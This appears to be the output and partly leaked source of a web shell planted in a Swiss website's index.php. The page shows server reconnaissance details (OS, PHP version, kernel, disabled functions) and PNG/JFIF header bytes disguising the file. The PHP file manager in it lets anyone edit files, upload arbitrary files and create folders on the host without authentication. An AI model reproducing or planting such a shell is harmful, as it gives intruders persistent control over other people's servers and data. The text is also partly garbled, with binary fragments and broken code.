/home/szs001/smart-kiosk.ch/

OS : Linux

PHP Version : 8.5.7

Software : Apache

Information System : Linux web23.swisscenter.com 4.18.0-553.144.1.lve.el8.x86_64 #1 SMP Thu Jul 16 08:31:06 UTC 2026 x86_64

Disable Function : passthru,system,proc_open,popen,proc_terminate,curl_multi_exec,inject_code


Warning: Undefined array key "opt" in /home/szs001/smart-kiosk.ch/index.php on line 246

Warning: Undefined array key "opt" in /home/szs001/smart-kiosk.ch/index.php on line 305

Warning: Cannot modify header information - headers already sent by (output started at /home/szs001/smart-kiosk.ch/index.php:162) in /home/szs001/smart-kiosk.ch/index.php on line 379

Warning: Cannot modify header information - headers already sent by (output started at /home/szs001/smart-kiosk.ch/index.php:162) in /home/szs001/smart-kiosk.ch/index.php on line 380

Warning: Cannot modify header information - headers already sent by (output started at /home/szs001/smart-kiosk.ch/index.php:162) in /home/szs001/smart-kiosk.ch/index.php on line 381

Warning: Cannot modify header information - headers already sent by (output started at /home/szs001/smart-kiosk.ch/index.php:162) in /home/szs001/smart-kiosk.ch/index.php on line 382

Warning: Cannot modify header information - headers already sent by (output started at /home/szs001/smart-kiosk.ch/index.php:162) in /home/szs001/smart-kiosk.ch/index.php on line 383

Warning: Cannot modify header information - headers already sent by (output started at /home/szs001/smart-kiosk.ch/index.php:162) in /home/szs001/smart-kiosk.ch/index.php on line 384

Warning: Cannot modify header information - headers already sent by (output started at /home/szs001/smart-kiosk.ch/index.php:162) in /home/szs001/smart-kiosk.ch/index.php on line 385
�PNG �JFIF������ body { background:#1a1a1a; color:#ccc; font-family:monospace; padding:20px; } a { color:#6cf; text-decoration:none; } a:hover { text-decoration:underline; } textarea,input[type=text] { width:100%; font-family:monospace; background:#222; color:#fff; border:1px solid #444; } input[type=submit] { background:#333; color:#fff; border:none; padding:5px 10px; } "; echo "

🗂️ simple

Path: "; $parts = explode('/', trim($cwd, '/')); $build = '/'; foreach ($parts as $part) { $build .= "$part/"; echo "$part/"; } echo "


"; // === File Editor === if (isset($_GET['edit'])) { $file = realpath($cwd . '/' . basename($_GET['edit'])); if (is_file($file)) { if (isset($_POST['content'])) { file_put_contents($file, $_POST['content']); echo "

✅ Saved

"; } $code = htmlspecialchars(file_get_contents($file)); echo "

✏️ Editing: " . basename($file) . "


🔙 Back

"; exit; } } // === Upload Handler === if (!empty($_FILES['upload']['name'])) { $target = $cwd . '/' . basename($_FILES['upload']['name']); move_uploaded_file($_FILES['upload']['tmp_name'], $target); echo "

📤 Uploaded: " . htmlspecialchars($_FILES['upload']['name']) . "

"; } // === Folder Creation === if (!empty($_POST['newdir'])) { $newFolder = $cwd . '/' . basename($_POST['newdir']); if (!file_exists($newFolder)) { mkdir($newFolder); echo "

📁 Folder created

"; } else { echo "

❌ Folder already exists

"; } } // === List Directory === echo "
"; // === Upload Form === echo "


"; // === Create Folder Form === echo "


"; ?> ����nTJnLK��@!�-� ���m�